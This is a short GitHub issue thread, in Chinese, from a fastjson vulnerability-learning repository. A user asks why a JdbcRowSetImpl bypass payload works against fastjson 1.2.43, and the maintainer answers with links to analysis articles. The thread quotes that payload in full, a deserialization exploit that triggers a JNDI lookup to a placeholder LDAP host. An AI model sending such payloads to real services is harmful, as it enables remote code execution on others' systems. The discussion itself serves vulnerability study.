LearnFastjsonVulnFromZero-Basic icon indicating copy to clipboard operation
LearnFastjsonVulnFromZero-Basic copied to clipboard
verified publisher icon W01fh4cker

请问关于fastjson1.2.43版本下的绕过payload有没有深度解析?

Open Bertram-demo opened this issue 10 months ago • 1 comments

在1.2.43版本下,使用了如下的payload绕过: { "@type":"[com.sun.rowset.JdbcRowSetImpl"[{ "dataSourceName":"ldap://xxx", "autoCommit":true } 只有添加"[{"才不会报错并且触发漏洞,请问是否了解具体原因,我看好多篇解析都没说到这个问题,不知道是不是我的查找方向错了

Bertram-demo avatar Mar 02 '25 16:03 Bertram-demo

https://blog.gm7.org/%E4%B8%AA%E4%BA%BA%E7%9F%A5%E8%AF%86%E5%BA%93/02.%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/01.java%E5%AE%89%E5%85%A8/03.%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/04.fastjson%E5%90%84%E7%89%88%E6%9C%AC%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90#fastjson-1243

https://xz.aliyun.com/t/9052#toc-7

可以参考这两篇文章多调试学习,仔细调试代码就可以发现,答案就在代码中。

W01fh4cker avatar Mar 02 '25 16:03 W01fh4cker